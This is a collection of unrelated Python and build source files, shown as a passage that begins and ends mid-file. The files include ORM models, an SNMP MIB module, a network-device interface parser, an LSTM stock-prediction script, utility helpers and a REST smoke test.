                    is_admin=admin)
        except IntegrityError:
            raise ValueError("User already exists")
class Post(Model):
    """A single journal entry belonging to a User."""
    title = CharField(max_length=50)
    date = DateField()  # the day the entry is about (not creation time)
    time_spent = CharField(max_length=50)
    learning = TextField()
    resources = TextField()
    timestamp = DateTimeField(default=datetime.datetime.now)
    user = ForeignKeyField(
        rel_model=User,
        related_name='posts'
    )
    class Meta:
        # Peewee configuration: backing database and default ordering
        # (most recent entry date first).
        database = DATABASE
        order_by = ('-date',)
    @classmethod
    def create_entry(cls, title, date, time_spent, learning,
                     resources, user):
        """Create a journal entry inside a transaction."""
        with DATABASE.transaction():
            cls.create(
                title=title,
                date=date,
                time_spent=time_spent,
                learning=learning,
                resources=resources,
                user=user,
            )
def initialize():
    """Connect, create missing tables, and always release the connection."""
    DATABASE.connect()
    try:
        # safe=True: creating a table that already exists is a no-op.
        DATABASE.create_tables([User, Post], safe=True)
    finally:
        # Close even when create_tables raises, so the connection never leaks
        # (the original skipped close() on error).
        DATABASE.close()
|
import sys
import logging
import getpass
import time
from irida_staramr_results import util
def user_credentials(username, password):
    """
    Validates username and password inputted as arguments.
    If either of the two are not specified the user will be prompted.
    :param username: username of the IRIDA account
    :param password: password of the IRIDA account
    :return: dict with "username" and "password" keys
    """
    if username is None:
        username = input("Enter your IRIDA username: \n")
    if password is None:
        print("Enter your IRIDA password: ")
        password = getpass.getpass()  # hidden input for the password
    return dict(username=username, password=password)
def output_file_name(file_name):
    """
    Validates name of the output file.
    This expects only the name without the file extension. However, if
    specified, it will remove it.
    :param file_name: name of output file
    """
    suffix = ".xlsx"
    if file_name.endswith(suffix):
        return file_name[:-len(suffix)]
    return file_name
def date_range(from_date, to_date):
    """
    Sets up FROM and TO date values in unix timestamp (millisecond).
    :param from_date: local date string, or None for the epoch start
    :param to_date: local date string, or None for "now"
    :return: dict with "from_date" and "to_date" millisecond timestamps
    """
    # Read the clock once: the original called time.time() separately for the
    # default and for the future-check, leaving a small race window.
    now_ms = time.time() * 1000
    if from_date is None:
        from_date = 0  # epoch start (1 January 1970 UTC) when unspecified
    else:
        from_date = util.local_to_timestamp(from_date)
    if to_date is None:
        to_date = now_ms  # default to the current timestamp
    else:
        to_date = util.local_to_timestamp(to_date)
    # Ensure neither of the two are in the future.
    if (to_date > now_ms) or (from_date > now_ms):
        logging.error("DateError: --from_date and --to_date cannot be in the future.")
        sys.exit(1)
    # Ensure FROM is earlier than TO.
    if from_date > to_date:
        logging.error("DateError: --from_date must be earlier than --to_date.")
        sys.exit(1)
    # Add 24 hours (86400000 milliseconds) to include to_date's full day.
    to_date = to_date + 86400000
    return {"from_date": from_date, "to_date": to_date}
|
# ---------------------------------------------------------------------
# Ericsson.MINI_LINK.get_interfaces
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfaces import IGetInterfaces
class Script(BaseScript):
    """Parse 'show interface' CLI output into the IGetInterfaces structure."""
    name = "Ericsson.MINI_LINK.get_interfaces"
    interface = IGetInterfaces
    # One text block per interface: from "Interface " through its
    # "collisions N" counter line.
    rx_port = re.compile(r"^Interface (?P<port>.+?)collisions \d+", re.MULTILINE | re.DOTALL)
    # Header of a block: name, hardware type, optional MAC, optional
    # unnumbered/PPP peer addressing, ifindex, MTU and flag list.
    rx_iface = re.compile(
        r"^(?P<ifname>\S+)\s*\n"
        r"^\s+Hardware is (?P<hw>\S+)(, address is (?P<mac>\S+))?\s*\n"
        r"(^\s+Interface is unnumbered. Using IPv4 address of (?P<u_iface>\S+) \((?P<local_ip>\S+)\)\s*\n)?"
        r"(^\s+Remote address: (?P<remote_ip>\S+)/32\s*\n)?"
        r"^\s+index (?P<ifindex>\d+) metric \d+ mtu (?P<mtu>\d+).+\n"
        r"^\s+<(?P<flags>\S+)>\s*\n",
        re.MULTILINE,
    )
    # CIDR-style inet lines inside a block.
    rx_ipv4_address = re.compile(r"^\s+inet (?P<ip_address>\d+\S+/\d+)", re.MULTILINE)
    def execute(self):
        """Collect and parse interface data from the device CLI."""
        interfaces = []
        v = self.cli_clean("show interface")
        for p in self.rx_port.finditer(v):
            # NOTE(review): rx_iface is assumed to match every block found by
            # rx_port; match would be None otherwise — confirm on real output.
            match = self.rx_iface.search(p.group("port"))
            i = {
                "name": match.group("ifname"),
                "type": self.profile.INTERFACE_TYPES.get(match.group("hw")),
                # Status is derived from the <...> flag list of the interface.
                "admin_status": "RUNNING" in match.group("flags"),
                "oper_status": "UP," in match.group("flags"),
                "enabled_protocols": [],
                "snmp_ifindex": int(match.group("ifindex")),
                "subinterfaces": [
                    {
                        "name": match.group("ifname"),
                        "admin_status": "RUNNING" in match.group("flags"),
                        "oper_status": "UP," in match.group("flags"),
                        "mtu": int(match.group("mtu")),
                        "snmp_ifindex": int(match.group("ifindex")),
                        "enabled_afi": [],
                    }
                ],
            }
            if match.group("mac"):
                i["mac"] = match.group("mac")
                i["subinterfaces"][0]["mac"] = match.group("mac")
            if match.group("u_iface"):
                # Unnumbered interface: borrows the IPv4 address of another.
                i["subinterfaces"][0]["ip_unnumbered_subinterface"] = match.group("u_iface")
            if match.group("local_ip") and match.group("remote_ip"):
                # Point-to-point pair is reported as a PPP tunnel.
                i["subinterfaces"][0]["tunnel"] = {
                    "type": "PPP",
                    "local_address": match.group("local_ip"),
                    "remote_address": match.group("remote_ip"),
                }
            for match in self.rx_ipv4_address.finditer(p.group("port")):
                if "IPv4" not in i["subinterfaces"][0]["enabled_afi"]:
                    i["subinterfaces"][0]["enabled_afi"] += ["IPv4"]
                if "ipv4_addresses" not in i["subinterfaces"][0]:
                    i["subinterfaces"][0]["ipv4_addresses"] = []
                i["subinterfaces"][0]["ipv4_addresses"] += [match.group("ip_address")]
            interfaces += [i]
        return [{"interfaces": interfaces}]
|
from civicboom.model.meta import Base, CacheChangeListener
from sqlalchemy import Column, ForeignKey
from sqlalchemy import String, Unicode, UnicodeText
from sqlalchemy import Integer, DateTime, Boolean
from sqlalchemy import func
from sqlalchemy.orm import relationship, backref
from sqlalchemy.schema import DDL
from cbutils.misc import now
import copy
class Message(Base):
    """A member-to-member message or notification.

    Per __type__ below: a NULL source_id marks a system notification and a
    NULL target_id marks a public message.
    """
    __tablename__ = "message"
    __mapper_args__ = {'extension': CacheChangeListener()}
    id = Column(Integer(), primary_key=True)
    source_id = Column(String(32), ForeignKey('member.id', onupdate="cascade"), nullable=True)
    target_id = Column(String(32), ForeignKey('member.id', onupdate="cascade"), nullable=True, index=True)
    timestamp = Column(DateTime(), nullable=False, default=now)
    subject = Column(Unicode(), nullable=False)
    content = Column(UnicodeText(), nullable=False)
    read = Column(Boolean(), nullable=False, default=False)
    target = relationship("Member", primaryjoin="Message.target_id==Member.id", backref=backref('messages_to' , cascade="all, delete-orphan"))
    source = relationship("Member", primaryjoin="Message.source_id==Member.id", backref=backref('messages_from', cascade="all, delete-orphan"))
    flags = relationship("FlaggedEntity" , backref=backref('offending_message'), cascade="all,delete-orphan")
    # Serialization overlays: 'default' exposes the raw columns; 'full' adds
    # the resolved source/target member dicts and display names.
    __to_dict__ = copy.deepcopy(Base.__to_dict__)
    __to_dict__.update({
        'default': {
            'id' : None ,
            #'type' : lambda message: message.__type__(), # AllanC - the message type is based on who is observing it, a message could be 'sent' or 'to' depending on the viewing user. This adds complications # Now added to messages index
            'source_id' : None ,
            'target_id' : None ,
            'timestamp' : None ,
            'subject' : None ,
            'content' : None ,
            'read' : None ,
        },
    })
    __to_dict__.update({
        'full' : copy.deepcopy(__to_dict__['default']) ,
        #'full+actions': copy.deepcopy(__to_dict__['default']) ,
    })
    __to_dict__['full'].update({
        'source' : lambda message: message.source.to_dict() if message.source!=None else None ,
        'source_name' : lambda message: str(message.source),
        'target' : lambda message: message.target.to_dict() if message.target!=None else None ,
        'target_name' : lambda message: str(message.target),
    })
    def __unicode__(self):
        return "%s: %s" % (self.subject, self.content)
    def __link__(self):
        """Canonical www URL for this message."""
        from civicboom.lib.web import url
        return url('message', id=self.id, sub_domain='www', qualified=True)
    def invalidate_cache(self, remove=False):
        """Drop (or remove) this message's cached representations."""
        from civicboom.lib.cache import invalidate_message
        invalidate_message(self, remove=remove)
    def __type__(self, member=None):
        """
        oh jesus, this is duplicated in the messages_index method as well as a post to_dict overlay

        Classify this message relative to *member* (a Member object or id):
        'sent', 'public', 'to' or 'notification'; None when undeterminable.
        """
        try:
            # Accept either a Member object (use its id) or a bare id.
            member = member.id
        except:
            pass
        if not member:
            return None
        if self.source_id == member and self.target_id :
            return 'sent'
        if self.source_id == member and not self.target_id :
            return 'public'
        if self.source_id and self.target_id == member:
            return 'to'
        if not self.source_id and self.target_id == member:
            return 'notification'
    def delete(self):
        """Delete via the action layer (keeps counters/caches consistent)."""
        from civicboom.lib.database.actions import del_message
        return del_message(self)
    def flag(self, **kargs):
        """
        Flag message
        """
        from civicboom.lib.database.actions import flag
        flag(self, **kargs)
# Database-side bookkeeping: a trigger that keeps each member's unread
# message/notification counters and last-message timestamps in sync with the
# message table.  Installed on table create, dropped before table drop.
DDL('DROP TRIGGER IF EXISTS update_num_unread ON message').execute_at('before-drop', Message.__table__)
DDL("""
CREATE OR REPLACE FUNCTION update_num_unread() RETURNS TRIGGER AS $$
DECLARE
tmp_target_id text;
BEGIN
-- UPDATE changing the target ID should never happen
tmp_target_id := CASE WHEN TG_OP='DELETE' THEN OLD.target_id ELSE NEW.target_id END;
UPDATE member SET num_unread_messages = (
SELECT COUNT(message.id)
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NOT NULL AND
NOT message.read
) WHERE member.id = tmp_target_id;
UPDATE member SET num_unread_notifications = (
SELECT COUNT(message.id)
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NULL AND
NOT message.read
) WHERE member.id = tmp_target_id;
UPDATE member SET last_message_timestamp = (
SELECT timestamp
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NOT NULL
ORDER BY message.id DESC
LIMIT 1
) WHERE member.id = tmp_target_id;
UPDATE member SET last_notification_timestamp = (
SELECT timestamp
FROM message
WHERE
message.target_id=member.id AND
message.source_id IS NULL
ORDER BY message.id DESC
LIMIT 1
) WHERE member.id = tmp_target_id;
RETURN NULL;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER update_num_unread
AFTER INSERT OR UPDATE OR DELETE ON message
FOR EACH ROW
EXECUTE PROCEDURE update_num_unread();
""").execute_at('after-create', Message.__table__)
|
"""
Command handler module for GMC
"""
import sys
import importlib
import os
from gmc.conf import ENVIRONMENT_VARIABLE
from gmc.conf import settings
def execute_from_command_line(argv=None, quiet=False):
    """
    try to load a module specified in the given path.
    Set GMC_SETTINGS_MODULE environment variable

    :param argv: command-line vector; defaults to sys.argv
    :param quiet: suppress console output when True
    """
    argv = argv or sys.argv[:]
    if len(argv) != 2:
        # Bug fix: the original only returned here when not quiet, so a
        # quiet caller with a short argv crashed on argv[1] below.
        if not quiet:
            print('Incorrect Usage of gmc-main command')
        return
    if os.path.exists(argv[1]):
        module_file = os.path.basename(argv[1])
        module_path = os.path.abspath(argv[1])
        module_dir = os.path.dirname(module_path)
        sys.path.append(module_dir)
        # splitext is robust for file names that merely contain '.py'
        # (the original split('.py')[0] truncated e.g. 'my.pystuff.py').
        module_name = os.path.splitext(module_file)[0]
        os.environ[ENVIRONMENT_VARIABLE] = module_name
    else:
        if not quiet:
            print('Incorrect format for settings.py path')
    if not quiet:
        try:
            print("Dataset Directory set to '%s'" % settings.DATASET_DIR)
            print("Results Directory set to '%s'" % settings.BRAIN_DIR)
        except AttributeError:
            print('Could not load settings')
from setuptools import setup, find_packages
setup(
    name="rotten_tomatoes_client",
    packages=find_packages(exclude=['tests*']),
    install_requires=["requests"],
    version="0.0.3",
    description="Rotten Tomatoes Client",
    author="Jae Bradley",
    author_email="jae.b.bradley@gmail.com",
    url="https://github.com/jaebradley/rotten_tomatoes_client",
    # Keep the tarball tag in lockstep with `version` above (it was left
    # pinned at 0.1 while the version advanced to 0.0.3).
    download_url="https://github.com/jaebradley/rotten_tomatoes_client/tarball/0.0.3",
    keywords=["rotten_tomatoes"],
    classifiers=[],
)
|
#
# PySNMP MIB module CISCO-ST-TC (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-ST-TC
# Produced by pysmi-0.3.4 at Mon Apr 29 17:36:22 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: auto-generated by pysmi from the CISCO-ST-TC ASN.1 source (see header
# above); regenerate rather than hand-edit.  `mibBuilder` is presumably
# injected by the PySNMP MIB loader when this module is executed — confirm.
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ciscoModules, = mibBuilder.importSymbols("CISCO-SMI", "ciscoModules")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, Bits, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, NotificationType, ObjectIdentity, Unsigned32, ModuleIdentity, TimeTicks, Gauge32, Counter64, iso, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Bits", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "NotificationType", "ObjectIdentity", "Unsigned32", "ModuleIdentity", "TimeTicks", "Gauge32", "Counter64", "iso", "IpAddress")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
storageTextualConventions = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 12, 4))
storageTextualConventions.setRevisions(('2012-08-08 00:00', '2011-07-26 00:00', '2010-12-24 00:00', '2008-05-16 00:00', '2005-12-17 00:00', '2004-05-18 00:00', '2003-09-26 00:00', '2003-08-07 00:00', '2002-10-04 00:00', '2002-09-24 00:00',))
if mibBuilder.loadTexts: storageTextualConventions.setLastUpdated('201208080000Z')
if mibBuilder.loadTexts: storageTextualConventions.setOrganization('Cisco Systems, Inc.')
# Textual conventions (value types with range/size constraints) used by the
# Cisco storage MIBs.
class VsanIndex(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class DomainId(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 239)
class DomainIdOrZero(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 239)
class FcAddressId(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 3)
    fixedLength = 3
class FcNameId(TextualConvention, OctetString):
    reference = 'Fibre Channel Framing and Signaling (FC-FS) Rev 1.70 - Section 14 Name_Indentifier Formats.'
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
    fixedLength = 8
class FcNameIdOrZero(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(8, 8), ValueSizeConstraint(16, 16), )
class FcClassOfServices(TextualConvention, Bits):
    status = 'current'
    namedValues = NamedValues(("classF", 0), ("class1", 1), ("class2", 2), ("class3", 3), ("class4", 4), ("class5", 5), ("class6", 6))
class FcPortTypes(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18))
    namedValues = NamedValues(("auto", 1), ("fPort", 2), ("flPort", 3), ("ePort", 4), ("bPort", 5), ("fxPort", 6), ("sdPort", 7), ("tlPort", 8), ("nPort", 9), ("nlPort", 10), ("nxPort", 11), ("tePort", 12), ("fvPort", 13), ("portOperDown", 14), ("stPort", 15), ("npPort", 16), ("tfPort", 17), ("tnpPort", 18))
class FcPortTxTypes(TextualConvention, Integer32):
    reference = 'IEEE Std 802.3-2005 carrier sense multiple access with collision detection (CSMA/CD) access method and physical layer specification.'
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
    namedValues = NamedValues(("unknown", 1), ("longWaveLaser", 2), ("shortWaveLaser", 3), ("longWaveLaserCostReduced", 4), ("electrical", 5), ("tenGigBaseSr", 6), ("tenGigBaseLr", 7), ("tenGigBaseEr", 8), ("tenGigBaseLx4", 9), ("tenGigBaseSw", 10), ("tenGigBaseLw", 11), ("tenGigBaseEw", 12))
class FcPortModuleTypes(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20))
    namedValues = NamedValues(("unknown", 1), ("other", 2), ("gbic", 3), ("embedded", 4), ("glm", 5), ("gbicWithSerialID", 6), ("gbicWithoutSerialID", 7), ("sfpWithSerialID", 8), ("sfpWithoutSerialID", 9), ("xfp", 10), ("x2Short", 11), ("x2Medium", 12), ("x2Tall", 13), ("xpakShort", 14), ("xpakMedium", 15), ("xpakTall", 16), ("xenpak", 17), ("sfpDwdm", 18), ("qsfp", 19), ("x2Dwdm", 20))
class FcIfSpeed(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))
    namedValues = NamedValues(("auto", 1), ("oneG", 2), ("twoG", 3), ("fourG", 4), ("autoMaxTwoG", 5), ("eightG", 6), ("autoMaxFourG", 7), ("tenG", 8), ("autoMaxEightG", 9), ("sixteenG", 10), ("autoMaxSixteenG", 11))
class PortMemberList(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 64)
class FcAddress(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(3, 3), ValueSizeConstraint(8, 8), )
class FcAddressType(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
    namedValues = NamedValues(("wwn", 1), ("fcid", 2))
class InterfaceOperMode(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21))
    namedValues = NamedValues(("auto", 1), ("fPort", 2), ("flPort", 3), ("ePort", 4), ("bPort", 5), ("fxPort", 6), ("sdPort", 7), ("tlPort", 8), ("nPort", 9), ("nlPort", 10), ("nxPort", 11), ("tePort", 12), ("fvPort", 13), ("portOperDown", 14), ("stPort", 15), ("mgmtPort", 16), ("ipsPort", 17), ("evPort", 18), ("npPort", 19), ("tfPort", 20), ("tnpPort", 21))
class FcIfServiceStateType(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
    namedValues = NamedValues(("inService", 1), ("outOfService", 2))
class FcIfSfpDiagLevelType(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
    namedValues = NamedValues(("unknown", 1), ("normal", 2), ("lowWarning", 3), ("lowAlarm", 4), ("highWarning", 5), ("highAlarm", 6))
# Register all conventions with the MIB builder under module CISCO-ST-TC.
mibBuilder.exportSymbols("CISCO-ST-TC", PortMemberList=PortMemberList, FcIfSfpDiagLevelType=FcIfSfpDiagLevelType, DomainIdOrZero=DomainIdOrZero, storageTextualConventions=storageTextualConventions, PYSNMP_MODULE_ID=storageTextualConventions, FcPortTxTypes=FcPortTxTypes, FcAddressType=FcAddressType, FcIfSpeed=FcIfSpeed, FcNameId=FcNameId, FcIfServiceStateType=FcIfServiceStateType, VsanIndex=VsanIndex, FcAddressId=FcAddressId, FcPortModuleTypes=FcPortModuleTypes, FcClassOfServices=FcClassOfServices, DomainId=DomainId, InterfaceOperMode=InterfaceOperMode, FcNameIdOrZero=FcNameIdOrZero, FcPortTypes=FcPortTypes, FcAddress=FcAddress)
|
import matplotlib.pyplot as plt
# Directory where all generated figures are written.
plots_path = "./plots/"
def plot_points(x, y, xlabel, ylabel, filename):
    """Plot y against x, label both axes, and save the figure into plots_path."""
    plt.plot(x, y)
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    plt.savefig(plots_path + filename)
    plt.close()  # free the figure so repeated calls don't accumulate state
def cluster_purity(clusterer,data,classes,debug=False):
    """Compute cluster purity: the fraction of instances that fall in the
    majority true class of their assigned cluster.

    clusterer must expose number_of_clusters and cluster_instance();
    data must expose get_instance(i) (looks like the python-weka-wrapper
    API — confirm).  classes holds the numeric true label per instance.
    """
    l = len(list(data))
    no_of_clusters = clusterer.number_of_clusters
    no_of_classes = len(set(classes))
    # confusion_matrix[cluster][true class] = instance count
    confusion_matrix = [[0 for _ in range(no_of_classes)] for _ in range(no_of_clusters)]
    for i in range(l):
        # Getting cluster label
        inst = data.get_instance(i)
        # Getting actual class label
        c = int(classes[i])
        try:
            cl = clusterer.cluster_instance(inst)
            confusion_matrix[cl][c] += 1
        except Exception as e:
            # Instances the clusterer cannot assign are skipped, but note
            # they still count in the denominator l below.
            continue
    # Purity = sum over clusters of the majority class count, divided by n.
    numer = 0
    for cl in confusion_matrix:
        numer += max(cl)
    purity = float(numer)/l
    if debug is True:
        print confusion_matrix
    return purity
|
# coding: utf8
from __future__ import unicode_literals
from .cli.info import info as cli_info
from .glossary import explain
from .about import __version__
from . import util
def load(name, **overrides):
    """Load a spaCy model by name or path.

    The pre-v2.0 keyword `path=` is rejected with a deprecation error; the
    path should now be passed as the first positional argument instead.
    """
    depr_path = overrides.get('path')
    # True/False/None are ignored so boolean flags named 'path' don't trip
    # the deprecation check; any real path value does.
    if depr_path not in (True, False, None):
        util.deprecated(
            "As of spaCy v2.0, the keyword argument `path=` is deprecated. "
            "You can now call spacy.load with the path as its first argument, "
            "and the model's meta.json will be used to determine the language "
            "to load. For example:\nnlp = spacy.load('{}')".format(depr_path),
            'error')
    return util.load_model(name, **overrides)
def blank(name, **kwargs):
    """Create an empty pipeline for the language class registered as *name*."""
    lang_cls = util.get_lang_class(name)
    return lang_cls(**kwargs)
def info(model=None, markdown=False):
    # Thin wrapper so the CLI info command is reachable as spacy.info().
    return cli_info(model, markdown)
|
import os
from datetime import datetime
def list_sub_dirs(dir_path):
    """Return the paths of the immediate subdirectories of *dir_path*.

    Raises RuntimeError when *dir_path* does not exist or is not a directory.
    """
    # isdir() is already False for a missing path, so this single check
    # covers both error cases of the original (exists + isdir) and raises
    # the same message.
    if not os.path.isdir(dir_path):
        raise RuntimeError("invalid dir path.")
    return [
        os.path.join(dir_path, name)
        for name in os.listdir(dir_path)
        if os.path.isdir(os.path.join(dir_path, name))
    ]
def flatten_dir_path(dir_path):
    """Collapse a two-level tree by one level: every grandchild directory is
    renamed to '<child>_<grandchild>' directly under *dir_path*."""
    for child_path in list_sub_dirs(dir_path):
        for grandchild_path in list_sub_dirs(child_path):
            grandchild_name = os.path.basename(grandchild_path)
            new_path = '_'.join([child_path, grandchild_name])
            print(f"move: {grandchild_path} -> {new_path}")
            os.renames(grandchild_path, new_path)
def create_dir(dir_path):
    """Create *dir_path* and return it; if it already exists, create a
    timestamp-suffixed sibling instead and return that path."""
    try:
        os.makedirs(dir_path)
        return dir_path
    except FileExistsError:
        # EAFP instead of the original exists()-then-makedirs sequence, so
        # two racing callers cannot both pass the check and then collide.
        return create_dir(dir_path + "." + datetime.now().strftime("%Y%m%d%H%M%S"))
|
# https://blog.csdn.net/a19990412/article/details/85139058
# LSTM实现股票预测--pytorch版本【120+行代码】
'''
模型假设
我这里认为每天的沪深300的最高价格,是依赖于当天的前n天的沪深300的最高价。
然后用RNN的LSTM模型来估计(捕捉到时序信息)。
让模型学会用前n天的最高价,来判断当天的最高价。
'''
# depends
import pandas as pd
import matplotlib.pyplot as plt
import datetime
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import Dataset, DataLoader
## load data
def generate_df_affect_by_n_days(series, n, index=False):
    """Build a supervised frame from *series*: columns c0..c{n-1} hold the
    n preceding values and column 'y' holds the current value."""
    if len(series) <= n:
        raise Exception("The Length of series is %d, while affect by (n=%d)." % (len(series), n))
    values = series.tolist()
    frame = pd.DataFrame()
    for offset in range(n):
        frame['c%d' % offset] = values[offset:-(n - offset)]
    frame['y'] = values[n:]
    if index:
        # Align the frame with the dates of the predicted values.
        frame.index = series.index[n:]
    return frame
def readData(column='high', n=30, all_too=True, index=False, train_end=-300):
    """Read sh.csv and build the lagged training frame for *column*.

    Returns (train_frame, full_column, date_index) when all_too is True,
    otherwise just the training frame.
    """
    raw = pd.read_csv("sh.csv", index_col=0)
    # Parse the string dates of the CSV index into datetime objects.
    raw.index = [datetime.datetime.strptime(d, "%Y-%m-%d") for d in raw.index]
    col_series = raw[column].copy()
    # Training slice; the test slice starts n rows earlier to provide lags.
    train_part, test_part = col_series[:train_end], col_series[train_end - n:]
    train_frame = generate_df_affect_by_n_days(train_part, n, index=index)
    if all_too:
        return train_frame, col_series, raw.index.tolist()
    return train_frame
## params
n = 30           # number of lagged days fed to the model
LR = 0.0001      # learning rate
EPOCH = 100
train_end = -500  # last 500 rows are held out for testing
## build
# NOTE(review): TrainSet and RNN are not defined anywhere in this file —
# presumably defined alongside in the source blog post; confirm the import.
df, df_all, df_index = readData('high', n=n, train_end=train_end)
df_all = np.array(df_all.tolist())
plt.plot(df_index, df_all, label='real-data')
# Standardize inputs; mean/std are reused below to de-normalize predictions.
df_numpy = np.array(df)
df_numpy_mean = np.mean(df_numpy)
df_numpy_std = np.std(df_numpy)
df_numpy = (df_numpy - df_numpy_mean) / df_numpy_std
df_tensor = torch.Tensor(df_numpy)
trainset = TrainSet(df_tensor)
trainloader = DataLoader(trainset, batch_size=10, shuffle=True)
## train
rnn = RNN(n)
optimizer = torch.optim.Adam(rnn.parameters(), lr=LR) # optimize all cnn parameters
loss_func = nn.MSELoss()
for step in range(EPOCH):
    for tx, ty in trainloader:
        output = rnn(torch.unsqueeze(tx, dim=0))
        loss = loss_func(torch.squeeze(output), ty)
        optimizer.zero_grad() # clear gradients for this training step
        loss.backward() # back propagation, compute gradients
        optimizer.step()
    print(step, loss)
    # NOTE(review): this saves on every step NOT divisible by 10; the intent
    # was probably `step % 10 == 0` — confirm.
    if step % 10:
        torch.save(rnn, 'rnn.pkl')
torch.save(rnn, 'rnn.pkl')
## output paint
# Re-run the trained model over the whole series, de-normalize, and split
# the predictions into the train and test segments for plotting.
generate_data_train = []
generate_data_test = []
test_index = len(df_all) + train_end
df_all_normal = (df_all - df_numpy_mean) / df_numpy_std
df_all_normal_tensor = torch.Tensor(df_all_normal)
for i in range(n, len(df_all)):
    x = df_all_normal_tensor[i - n:i]
    x = torch.unsqueeze(torch.unsqueeze(x, dim=0), dim=0)
    y = rnn(x)
    if i < test_index:
        generate_data_train.append(torch.squeeze(y).detach().numpy() * df_numpy_std + df_numpy_mean)
    else:
        generate_data_test.append(torch.squeeze(y).detach().numpy() * df_numpy_std + df_numpy_mean)
plt.plot(df_index[n:train_end], generate_data_train, label='generate_train')
plt.plot(df_index[train_end:], generate_data_test, label='generate_test')
plt.legend()
plt.show()
|
import requests
from nose.plugins.attrib import attr
@attr('webservice')
def test_rest_api_responsive():
    """Smoke test: the INDRA REST cyjs assembler endpoint accepts a statement."""
    payload = '{"statements": [{"sbo": "http://identifiers.org/sbo/SBO:0000526", "type": "Complex", "id": "acc6d47c-f622-41a4-8ae9-d7b0f3d24a2f", "members": [{"db_refs": {"TEXT": "MEK", "FPLX": "MEK"}, "name": "MEK"}, {"db_refs": {"TEXT": "ERK", "NCIT": "C26360", "FPLX": "ERK"}, "name": "ERK"}], "evidence": [{"text": "MEK binds ERK", "source_api": "trips"}]}]}'
    endpoint = 'http://api.indra.bio:8000/assemblers/cyjs'
    response = requests.post(endpoint, payload)
    assert response.status_code == 200
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# GYP include list: each listed .gypi contributes its targets/settings to
# this build file.
{
  'includes': [
    'auto_login_parser.gypi',
    'components_tests.gypi',
    'navigation_interception.gypi',
    'visitedlink.gypi',
    'web_contents_delegate_android.gypi',
  ],
}
|
"""Game Entities.
"""
class GamePlayer(object):
    """State of a single player: identity, affiliation, resources, position.

    BUG FIX: `speed` previously defaulted to a mutable list literal, so every
    instance constructed without an explicit `speed` shared ONE list — a
    mutation through any of them was visible in all. A `None` sentinel now
    yields a fresh list per instance; passing a list explicitly is unchanged.
    """

    def __init__(self, symbol="", name="", team=0, loyalty=0, energy=0,
